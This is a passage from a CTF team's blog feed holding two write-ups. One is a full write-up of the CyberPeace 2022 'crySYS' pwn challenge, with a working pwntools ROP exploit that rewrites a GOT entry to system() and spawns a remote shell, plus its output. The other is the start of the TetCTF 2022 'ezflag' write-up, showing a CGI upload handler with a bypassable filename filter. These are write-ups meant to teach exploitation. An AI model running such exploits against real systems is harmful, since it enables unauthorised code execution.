Jekyll2022-01-11T14:32:26+08:00https://nandynarwhals.org/feed.xmlAn information security research and CTF blog for the Nandy Narwhals and Dystopian Narwhals CTF Teams.amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org2022-01-11T00:00:00+08:002022-01-11T00:00:00+08:00https://nandynarwhals.org/cyberpeace-2022-crysys<p>Summary: A minimal binary with only the read libc function and containing a standard stack overflow can be exploited by leveraging a common add-what-where gadget to adjust GOT entries. This removes the requirement for memory leaks. Additionally, the ret2dlresolve technique was investigated but exploitation requires a missing write-at-an-offset gadget.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <p><img src="https://nandynarwhals.org/assets/images/cyberpeace-2022/crysys_prompt.png" alt="Challenge Prompt" class="align-center" /></p> <p>Attachment: <a href="https://nandynarwhals.org/assets/files/cyberpeace-2022/cbd2d300-dc64-4aae-8d51-671a6d0e5b5f.zip">challenge file</a></p> <h2 id="solution">Solution</h2> <p>Extracting the zip file shows that we have the following files:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>unzip <span class="nt">-l</span> cbd2d300-dc64-4aae-8d51-671a6d0e5b5f.zip <span class="go">Archive: cbd2d300-dc64-4aae-8d51-671a6d0e5b5f.zip Length Date Time Name --------- ---------- ----- ---- 276 10-16-2020 17:59 crySYS.c 8272 10-16-2020 17:41 crySYS 170960 10-16-2020 17:41 ld-2.27.so 2030544 10-16-2020 17:41 libc-2.27.so --------- ------- 2210052 4 files </span></code></pre></div></div> <p>The source to the challenge is given as follows.</p> <div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include &lt;stdio.h&gt; #include &lt;unistd.h&gt; </span> <span class="c1">//gcc -o challenge -no-pie -fno-stack-protector challenges.c</span> <span class="c1">//LD_PRELOAD=./libc-2.27.so ./ld-2.27.so ./challenge</span> <span class="kt">int</span> <span class="nf">not_vulnerable</span><span class="p">(){</span> <span class="kt">char</span> <span class="n">buf</span><span class="p">[</span><span class="mi">80</span><span class="p">];</span> <span class="k">return</span> <span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">buf</span><span class="p">,</span> <span class="mh">0x1000</span><span class="p">);</span> <span class="p">}</span> <span class="kt">int</span> <span class="nf">main</span><span class="p">(){</span> <span class="n">not_vulnerable</span><span class="p">();</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span> </code></pre></div></div> <p>This actually looks like a rip-off of the <code class="language-plaintext highlighter-rouge">ret2dlresolve</code> sample in the <a href="https://docs.pwntools.com/en/stable/rop/ret2dlresolve.html">Pwntools documentation</a>. Unfortunately, we cannot use the technique in its original form since the binary uses huge pages.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">gef➤ vmmap [ Legend: Code | Heap | Stack ] Start End Offset Perm Path 0x0000000000400000 0x0000000000401000 0x0000000000000000 r-x /vagrant/cyberpeace/crysys/crySYS 0x0000000000600000 0x0000000000601000 0x0000000000000000 r-- /vagrant/cyberpeace/crysys/crySYS 0x0000000000601000 0x0000000000602000 0x0000000000001000 rw- /vagrant/cyberpeace/crysys/crySYS 0x00007ffff79e2000 0x00007ffff7bc9000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/libc-2.27.so 0x00007ffff7bc9000 0x00007ffff7dc9000 0x00000000001e7000 --- /lib/x86_64-linux-gnu/libc-2.27.so 0x00007ffff7dc9000 0x00007ffff7dcd000 0x00000000001e7000 r-- /lib/x86_64-linux-gnu/libc-2.27.so 0x00007ffff7dcd000 0x00007ffff7dcf000 0x00000000001eb000 rw- /lib/x86_64-linux-gnu/libc-2.27.so 0x00007ffff7dcf000 0x00007ffff7dd3000 0x0000000000000000 rw- 0x00007ffff7dd3000 0x00007ffff7dfc000 0x0000000000000000 r-x /lib/x86_64-linux-gnu/ld-2.27.so 0x00007ffff7fea000 0x00007ffff7fec000 0x0000000000000000 rw- 0x00007ffff7ff7000 0x00007ffff7ffa000 0x0000000000000000 r-- [vvar] 0x00007ffff7ffa000 0x00007ffff7ffc000 0x0000000000000000 r-x [vdso] 0x00007ffff7ffc000 0x00007ffff7ffd000 0x0000000000029000 r-- /lib/x86_64-linux-gnu/ld-2.27.so 0x00007ffff7ffd000 0x00007ffff7ffe000 0x000000000002a000 rw- /lib/x86_64-linux-gnu/ld-2.27.so 0x00007ffff7ffe000 0x00007ffff7fff000 0x0000000000000000 rw- 0x00007ffffffde000 0x00007ffffffff000 0x0000000000000000 rw- [stack] 0xffffffffff600000 0xffffffffff601000 0x0000000000000000 r-x [vsyscall] gef➤ </span></code></pre></div></div> <p>There is a way to exploit this scenario, however we need either a leak or a gadget to write at an offset to a dereferenced address. This is explored in this excellent author’s writeup for <a href="https://activities.tjhsst.edu/csc/writeups/redpwnctf-2021-devnull">devnull-as-a-service from redpwnCTF 2021</a>. However, the writeup also mentions an interesting well-known gadget that appears in GCC compiled binaries:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>add dword ptr [rbp - 0x3d], ebx </code></pre></div></div> <p>This turns out to be present in <code class="language-plaintext highlighter-rouge">crySYS</code> as well.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>ROPgadget <span class="nt">--binary</span> crySYS | <span class="nb">grep</span> <span class="s1">'\[rbp -'</span> <span class="gp">0x00000000004004c8 : add dword ptr [rbp - 0x3d], ebx ;</span><span class="w"> </span>nop dword ptr <span class="o">[</span>rax + rax] <span class="p">;</span> ret </code></pre></div></div> <p>Since this is an add-what-where primitive, we can use this to simply add an offset to the resolved <code class="language-plaintext highlighter-rouge">read</code> libc address in the GOT such that it points to a useful function such as <code class="language-plaintext highlighter-rouge">system</code>. Additionally, we can use a second stage with <code class="language-plaintext highlighter-rouge">read</code> to write an arbitrary string to execute in the <code class="language-plaintext highlighter-rouge">.bss</code> section. Putting this together yields the following script:</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python </span> <span class="kn">from</span> <span class="nn">pwn</span> <span class="kn">import</span> <span class="o">*</span> <span class="kn">from</span> <span class="nn">one_gadget</span> <span class="kn">import</span> <span class="n">generate_one_gadget</span> <span class="c1"># context.log_level = 'debug' </span><span class="n">context</span><span class="p">.</span><span class="n">arch</span> <span class="o">=</span> <span class="s">'amd64'</span> <span class="n">binary_path</span> <span class="o">=</span> <span class="s">"./crySYS"</span> <span class="n">libc_path</span> <span class="o">=</span> <span class="s">"./libc-2.27.so"</span> <span class="n">ld_path</span> <span class="o">=</span> <span class="s">"./ld-2.27.so"</span> <span class="c1"># 0x00000000004004c8 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret </span><span class="n">add_gadget</span> <span class="o">=</span> <span class="mh">0x00000000004004c8</span> <span class="k">def</span> <span class="nf">main</span><span class="p">():</span> <span class="c1"># Start the process/make the connection. </span> <span class="c1"># p = process([ld_path, binary_path], env={'LD_PRELOAD': libc_path}) </span> <span class="n">p</span> <span class="o">=</span> <span class="n">remote</span><span class="p">(</span><span class="s">"152.96.7.6"</span><span class="p">,</span> <span class="mi">1337</span><span class="p">)</span> <span class="c1"># Calculate some useful values. </span> <span class="n">libc_elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">libc_path</span><span class="p">)</span> <span class="n">elf</span> <span class="o">=</span> <span class="n">ELF</span><span class="p">(</span><span class="n">binary_path</span><span class="p">)</span> <span class="n">read_got</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">got</span><span class="p">[</span><span class="s">'read'</span><span class="p">]</span> <span class="n">libc_system</span> <span class="o">=</span> <span class="n">libc_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'system'</span><span class="p">]</span> <span class="n">libc_read</span> <span class="o">=</span> <span class="n">libc_elf</span><span class="p">.</span><span class="n">symbols</span><span class="p">[</span><span class="s">'read'</span><span class="p">]</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'system@libc: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc_system</span><span class="p">)))</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'read@libc: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">libc_read</span><span class="p">)))</span> <span class="n">system_offset</span> <span class="o">=</span> <span class="n">libc_system</span> <span class="o">-</span> <span class="n">libc_read</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'system offset in libc from read: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">system_offset</span><span class="p">)))</span> <span class="n">system_offset</span> <span class="o">=</span> <span class="n">system_offset</span> <span class="o">&amp;</span> <span class="mh">0xffffffffffffffff</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'Twos complement of this offset: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">system_offset</span><span class="p">)))</span> <span class="c1"># Determine a writable location. </span> <span class="n">binsh_addr</span> <span class="o">=</span> <span class="n">elf</span><span class="p">.</span><span class="n">bss</span><span class="p">()</span> <span class="o">+</span> <span class="mh">0x10</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">'/bin/sh string Address: {}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="nb">hex</span><span class="p">(</span><span class="n">binsh_addr</span><span class="p">)))</span> <span class="c1"># Construct the chain to use the add-what-where gadget and ret2csu to modify read@got to system. </span> <span class="n">rop_chain</span> <span class="o">=</span> <span class="n">ROP</span><span class="p">(</span><span class="n">elf</span><span class="p">)</span> <span class="c1"># Read the address of read_got to the writable address we control to write the command. </span> <span class="n">rop_chain</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="n">binsh_addr</span><span class="p">)</span> <span class="c1"># Setup the registers for the add-what-where. rbp has to account for the -0x3d </span> <span class="n">rop_chain</span><span class="p">.</span><span class="n">ret2csu</span><span class="p">(</span><span class="n">edi</span><span class="o">=</span><span class="mh">0xdeadbeef</span><span class="p">,</span> <span class="n">rbx</span><span class="o">=</span><span class="n">system_offset</span><span class="p">,</span> <span class="n">rbp</span><span class="o">=</span><span class="n">read_got</span> <span class="o">+</span> <span class="mh">0x3d</span><span class="p">)</span> <span class="c1"># Trigger the add-what-where to transform read@got to system. </span> <span class="n">rop_chain</span><span class="p">.</span><span class="n">raw</span><span class="p">(</span><span class="n">add_gadget</span><span class="p">)</span> <span class="c1"># Fix up the aligning with a ret. </span> <span class="n">rop_chain</span><span class="p">.</span><span class="n">raw</span><span class="p">(</span><span class="n">rop_chain</span><span class="p">.</span><span class="n">ret</span><span class="p">)</span> <span class="c1"># Call our system() </span> <span class="n">rop_chain</span><span class="p">.</span><span class="n">read</span><span class="p">(</span><span class="n">binsh_addr</span><span class="p">)</span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="n">rop_chain</span><span class="p">.</span><span class="n">dump</span><span class="p">())</span> <span class="c1"># Send the first stage. </span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Sending the first stage."</span><span class="p">)</span> <span class="n">payload</span> <span class="o">=</span> <span class="n">flat</span><span class="p">({</span><span class="mi">88</span><span class="p">:</span> <span class="n">rop_chain</span><span class="p">.</span><span class="n">chain</span><span class="p">()},</span> <span class="n">filler</span><span class="o">=</span><span class="sa">b</span><span class="s">'X'</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span> <span class="c1"># In the second stage, write the command we want to execute. </span> <span class="c1"># Using just /bin/sh alone seems to end in a segfault after the first command so let's get a </span> <span class="c1"># nicer shell. </span> <span class="n">log</span><span class="p">.</span><span class="n">info</span><span class="p">(</span><span class="s">"Sending the second stage."</span><span class="p">)</span> <span class="n">command</span> <span class="o">=</span> <span class="sa">b</span><span class="s">'/bin/sh -c "/bin/bash"</span><span class="se">\x00</span><span class="s">'</span> <span class="n">p</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">command</span><span class="p">)</span> <span class="c1"># Obtain our shell. </span> <span class="n">log</span><span class="p">.</span><span class="n">success</span><span class="p">(</span><span class="s">"Enjoy your shell!"</span><span class="p">)</span> <span class="n">p</span><span class="p">.</span><span class="n">interactive</span><span class="p">()</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="n">main</span><span class="p">()</span> </code></pre></div></div> <p>Running the script gives us the flag.</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span>python exploit.py <span class="go">[+] Opening connection to 152.96.7.6 on port 1337: Done [*] '/vagrant/cyberpeace/crysys/libc-2.27.so' Arch: amd64-64-little RELRO: Partial RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled [*] '/vagrant/cyberpeace/crysys/crySYS' Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0x400000) [*] system@libc: 0x4f440 [*] read@libc: 0x110070 [*] system offset in libc from read: -0xc0c30 [*] Twos complement of this offset: 0xfffffffffff3f3d0 [*] /bin/sh string Address: 0x601040 [*] Loaded 14 cached gadgets for './crySYS' </span><span class="gp">[*] 0x0000: 0x400583 pop rdi;</span><span class="w"> </span>ret <span class="go"> 0x0008: 0x0 [arg0] rdi = 0 </span><span class="gp"> 0x0010: 0x400581 pop rsi;</span><span class="w"> </span>pop r15<span class="p">;</span> ret <span class="go"> 0x0018: 0x601040 [arg1] rsi = 6295616 </span><span class="gp"> 0x0020: b'iaaajaaa' &lt;pad r15&gt;</span><span class="w"> </span><span class="go"> 0x0028: 0x4003f0 read 0x0030: 0x40057a 0x0038: 0x0 0x0040: 0x1 0x0048: 0x600e48 0x0050: 0xdeadbeef 0x0058: b'waaaxaaa' rsi 0x0060: b'yaaazaab' rdx 0x0068: 0x400560 </span><span class="gp"> 0x0070: b'daabeaab' &lt;add rsp, 8&gt;</span><span class="w"> </span><span class="go"> 0x0078: 0xfffffffffff3f3d0 0x0080: 0x601055 0x0088: b'jaabkaab' r12 0x0090: b'laabmaab' r13 0x0098: b'naaboaab' r14 0x00a0: b'paabqaab' r15 0x00a8: 0x4004c8 0x00b0: 0x4003de ret </span><span class="gp"> 0x00b8: 0x400583 pop rdi;</span><span class="w"> </span>ret <span class="go"> 0x00c0: 0x601040 [arg0] rdi = 6295616 0x00c8: 0x4003f0 read [*] Sending the first stage. [*] Sending the second stage. [+] Enjoy your shell! [*] Switching to interactive mode </span><span class="gp">$</span><span class="w"> </span><span class="nb">id</span> <span class="go">uid=1000(hacker) gid=1000(hacker) groups=1000(hacker) </span><span class="gp">$</span><span class="w"> </span><span class="nb">uname</span> <span class="nt">-a</span> <span class="gp">Linux 24ec36d4-ad5b-4eb5-8fcd-e00e61def718 3.10.0-1160.11.1.el7.x86_64 #</span>1 SMP Fri Dec 18 16:34:56 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux <span class="gp">$</span><span class="w"> </span><span class="nb">ls</span> <span class="nt">-la</span> <span class="go">total 3144 drwxr-xr-x. 1 root root 185 Jan 4 2021 . drwxr-xr-x. 1 root root 20 Jan 4 2021 .. -rw-r--r--. 1 root root 220 Apr 4 2018 .bash_logout -rw-r--r--. 1 root root 3771 Apr 4 2018 .bashrc -rw-r--r--. 1 root root 807 Apr 4 2018 .profile -rwxrwxr-x. 1 root root 8272 Oct 16 2020 crySYS -rw-rw-r--. 1 root root 276 Oct 16 2020 crySYS.c -rw-rw-r--. 1 root root 973583 Oct 16 2020 crysys.zip -rw-rw-r--. 1 root root 39 Oct 16 2020 flag -rwxrwxr-x. 1 root root 170960 Oct 16 2020 ld-2.27.so -rw-rw-r--. 1 root root 2030544 Oct 16 2020 libc-2.27.so -rwxrwxr-x. 1 root root 198 Oct 16 2020 run.sh -rwxrwxr-x. 1 root root 100 Oct 16 2020 start.sh </span><span class="gp">$</span><span class="w"> </span><span class="nb">cat </span>flag <span class="gp">HL{PPPwned-7165-4679-8c39-cf7633bdf81b}$</span><span class="w"> </span></code></pre></div></div> <p><strong>Flag:</strong> <code class="language-plaintext highlighter-rouge">HL{PPPwned-7165-4679-8c39-cf7633bdf81b}</code></p>amon (j. heng)amon@nandynarwhals.orghttps://nandynarwhals.org

Summary: A minimal binary with only the read libc function and containing a standard stack overflow can be exploited by leveraging a common add-what-where gadget to adjust GOT entries. This removes the requirement for memory leaks. Additionally, the ret2dlresolve technique was investigated but exploitation requires a missing write-at-an-offset gadget.

2022-01-03T00:00:00+08:002022-01-03T00:00:00+08:00https://nandynarwhals.org/tetctf-2022-ezflag<p>Summary: In this two part challenge, flawed filename logic allows an attacker to write arbitrary Python files that are executed as a CGI script. Once the attacker obtains a shell on the system, they can exploit a straightforward buffer overflow in a forking statically compiled binary that authenticates basic authentication login attempts. Since the binary forks per connection, the stack canary can be leaked in one connection, and a ROP chain can be sent in the second with the fixed canary. Additionally, to simplify exploitation and avoid messing with file descriptor duping, a shell script can be created on the filesystem beforehand to be executed with the ROP chain to run our arbitrary commands.</p> <h2 id="challenge-prompt">Challenge Prompt</h2> <p>Part 1:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>47 Solves Ezflag level 1 100 Points We found an internal storage system exposed to the internet. By ambushing one of the employee, we got some files and the credentials of the system: "admin:admin". Unfortunately, our agent was poisoned and cannot continue hacking. Can you help us? Service: http://18.220.157.154:9090/ or Service: http://3.22.71.49:9080/ Binary Author: @nyancat0131 </code></pre></div></div> <p>Attachment: <a href="https://nandynarwhals.org/assets/files/tetctf2022/ezflag_109ff451f9d11258d01594c77aae131c.tar.gz">challenge file</a></p> <p>Part 2:</p> <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>20 Solves Ezflag level 2 639 Solved Level 1 first! Service: http://18.220.157.154:9090/ or Service: http://3.22.71.49:9080/ Author: @nyancat0131 </code></pre></div></div> <h2 id="solution">Solution</h2> <h3 id="part-1">Part 1</h3> <p>Unpacking the tar file provided yields the following web application deployment files:</p> <div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">$</span><span class="w"> </span><span class="nb">tar </span>xvf ezflag_109ff451f9d11258d01594c77aae131c.tar.gz <span class="go">x ezflag/conf/ x ezflag/conf/lighttpd.conf x ezflag/conf/nginx-site.conf x ezflag/www/ x ezflag/www/html/ x ezflag/www/cgi-bin/ x ezflag/www/upload/ x ezflag/www/upload/shell.py x ezflag/www/cgi-bin/upload.py x ezflag/www/html/upload.html </span></code></pre></div></div> <p>The <code class="language-plaintext highlighter-rouge">upload.py</code> file implements the main web application logic through CGI. Breaking it up, we have the main function that performs basic authentication check and if it passes, dispatches to the right handler.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python3 </span> <span class="kn">import</span> <span class="nn">os</span> <span class="kn">import</span> <span class="nn">cgi</span> <span class="kn">import</span> <span class="nn">base64</span> <span class="kn">import</span> <span class="nn">socket</span> <span class="k">def</span> <span class="nf">write_header</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">value</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="bp">None</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">'{:s}: {:s}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="n">value</span><span class="p">))</span> <span class="k">def</span> <span class="nf">write_status</span><span class="p">(</span><span class="n">code</span><span class="p">,</span> <span class="n">msg</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="bp">None</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">'Status: {:d} {:s}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">code</span><span class="p">,</span> <span class="n">msg</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="s">'</span><span class="se">\n\n</span><span class="s">'</span><span class="p">)</span> <span class="k">def</span> <span class="nf">write_location</span><span class="p">(</span><span class="n">url</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="bp">None</span><span class="p">:</span> <span class="k">print</span><span class="p">(</span><span class="s">'Location: {:s}'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">url</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="s">'</span><span class="se">\n\n</span><span class="s">'</span><span class="p">)</span> <span class="p">...</span> <span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">'__main__'</span><span class="p">:</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">check_auth</span><span class="p">():</span> <span class="n">write_header</span><span class="p">(</span><span class="s">'WWW-Authenticate'</span><span class="p">,</span> <span class="s">'Basic'</span><span class="p">)</span> <span class="n">write_status</span><span class="p">(</span><span class="mi">401</span><span class="p">,</span> <span class="s">'Unauthorized'</span><span class="p">)</span> <span class="k">else</span><span class="p">:</span> <span class="n">method</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'REQUEST_METHOD'</span><span class="p">)</span> <span class="k">if</span> <span class="n">method</span> <span class="o">==</span> <span class="s">'POST'</span><span class="p">:</span> <span class="n">handle_post</span><span class="p">()</span> <span class="k">elif</span> <span class="n">method</span> <span class="o">==</span> <span class="s">'GET'</span><span class="p">:</span> <span class="n">handle_get</span><span class="p">()</span> <span class="k">else</span><span class="p">:</span> <span class="n">write_status</span><span class="p">(</span><span class="mi">405</span><span class="p">,</span> <span class="s">'Method Not Allowed'</span><span class="p">)</span> </code></pre></div></div> <p>The basic authentication check parses the header and then forwards the <code class="language-plaintext highlighter-rouge">username</code> and <code class="language-plaintext highlighter-rouge">password</code> as newline terminated strings to a server listening on port <code class="language-plaintext highlighter-rouge">4444</code> on the remote localhost. It checks if the first byte sent back is a <code class="language-plaintext highlighter-rouge">'Y'</code>. We are given the username and password of <code class="language-plaintext highlighter-rouge">admin:admin</code> so we’ll just use these credentials for now.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">check_auth</span><span class="p">()</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="n">auth</span> <span class="o">=</span> <span class="n">os</span><span class="p">.</span><span class="n">environ</span><span class="p">.</span><span class="n">get</span><span class="p">(</span><span class="s">'HTTP_AUTHORIZATION'</span><span class="p">)</span> <span class="k">if</span> <span class="n">auth</span> <span class="ow">is</span> <span class="bp">None</span> <span class="ow">or</span> <span class="nb">len</span><span class="p">(</span><span class="n">auth</span><span class="p">)</span> <span class="o">&lt;</span> <span class="mi">6</span> <span class="ow">or</span> <span class="n">auth</span><span class="p">[</span><span class="mi">0</span><span class="p">:</span><span class="mi">6</span><span class="p">]</span> <span class="o">!=</span> <span class="s">'Basic '</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="n">auth</span> <span class="o">=</span> <span class="n">auth</span><span class="p">[</span><span class="mi">6</span><span class="p">:]</span> <span class="k">try</span><span class="p">:</span> <span class="n">data</span> <span class="o">=</span> <span class="n">base64</span><span class="p">.</span><span class="n">b64decode</span><span class="p">(</span><span class="n">auth</span><span class="p">.</span><span class="n">strip</span><span class="p">().</span><span class="n">encode</span><span class="p">(</span><span class="s">'ascii'</span><span class="p">)).</span><span class="n">split</span><span class="p">(</span><span class="sa">b</span><span class="s">':'</span><span class="p">)</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="o">!=</span> <span class="mi">2</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="n">username</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="n">password</span> <span class="o">=</span> <span class="n">data</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">username</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">8</span> <span class="ow">or</span> <span class="nb">len</span><span class="p">(</span><span class="n">password</span><span class="p">)</span> <span class="o">&gt;</span> <span class="mi">16</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="n">s</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="p">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="p">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="s">'127.0.0.1'</span><span class="p">,</span> <span class="mi">4444</span><span class="p">))</span> <span class="n">s</span><span class="p">.</span><span class="n">settimeout</span><span class="p">(</span><span class="mi">5</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">username</span> <span class="o">+</span> <span class="sa">b</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span> <span class="o">+</span> <span class="n">password</span> <span class="o">+</span> <span class="sa">b</span><span class="s">'</span><span class="se">\n</span><span class="s">'</span><span class="p">)</span> <span class="n">result</span> <span class="o">=</span> <span class="n">s</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="n">s</span><span class="p">.</span><span class="n">close</span><span class="p">()</span> <span class="k">if</span> <span class="n">result</span> <span class="o">==</span> <span class="sa">b</span><span class="s">'Y'</span><span class="p">:</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">except</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> </code></pre></div></div> <p>The <code class="language-plaintext highlighter-rouge">GET</code> handler is simple, it just prints the contents of an <code class="language-plaintext highlighter-rouge">upload.html</code> HTML file in the response.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">handle_get</span><span class="p">()</span> <span class="o">-&gt;</span> <span class="bp">None</span><span class="p">:</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="s">'../html/upload.html'</span><span class="p">,</span> <span class="s">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="n">dat</span> <span class="o">=</span> <span class="n">f</span><span class="p">.</span><span class="n">read</span><span class="p">()</span> <span class="n">write_header</span><span class="p">(</span><span class="s">'Content-Type'</span><span class="p">,</span> <span class="s">'text/html'</span><span class="p">)</span> <span class="n">write_header</span><span class="p">(</span><span class="s">'Content-Length'</span><span class="p">,</span> <span class="nb">str</span><span class="p">(</span><span class="nb">len</span><span class="p">(</span><span class="n">dat</span><span class="p">)))</span> <span class="n">write_status</span><span class="p">(</span><span class="mi">200</span><span class="p">,</span> <span class="s">'OK'</span><span class="p">)</span> <span class="k">print</span><span class="p">(</span><span class="n">dat</span><span class="p">.</span><span class="n">decode</span><span class="p">(</span><span class="s">'utf-8'</span><span class="p">),</span> <span class="n">end</span><span class="o">=</span><span class="bp">None</span><span class="p">)</span> </code></pre></div></div> <p>The <code class="language-plaintext highlighter-rouge">POST</code> handler is more interesting. It allows for the writing of an arbitrary file to an <code class="language-plaintext highlighter-rouge">upload</code> directory with some constraints on the filename. It checks for the existence of <code class="language-plaintext highlighter-rouge">..</code> or <code class="language-plaintext highlighter-rouge">.py</code> in the filename and rejects it if found. Additionally, it also ‘normalises’ the filename by removing all occurrences of <code class="language-plaintext highlighter-rouge">'./'</code>.</p> <div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">valid_file_name</span><span class="p">(</span><span class="n">name</span><span class="p">)</span> <span class="o">-&gt;</span> <span class="nb">bool</span><span class="p">:</span> <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">name</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span> <span class="ow">or</span> <span class="n">name</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">==</span> <span class="s">'/'</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">if</span> <span class="s">'..'</span> <span class="ow">in</span> <span class="n">name</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">if</span> <span class="s">'.py'</span> <span class="ow">in</span> <span class="n">name</span><span class="p">:</span> <span class="k">return</span> <span class="bp">False</span> <span class="k">return</span> <span class="bp">True</span> <span class="k">def</span> <span class="nf">handle_post</span><span class="p">()</span> <span class="o">-&gt;</span> <span class="bp">None</span><span class="p">:</span> <span class="n">fs</span> <span class="o">=</span> <span class="n">cgi</span><span class="p">.</span><span class="n">FieldStorage</span><span class="p">()</span> <span class="n">item</span> <span class="o">=</span> <span class="n">fs</span><span class="p">[</span><span class="s">'file'</span><span class="p">]</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">item</span><span class="p">.</span><span class="nb">file</span><span class="p">:</span> <span class="n">write_status</span><span class="p">(</span><span class="mi">400</span><span class="p">,</span> <span class="s">'Bad Request'</span><span class="p">)</span> <span class="k">return</span> <span class="k">if</span> <span class="ow">not</span> <span class="n">valid_file_name</span><span class="p">(</span><span class="n">item</span><span class="p">.</span><span class="n">filename</span><span 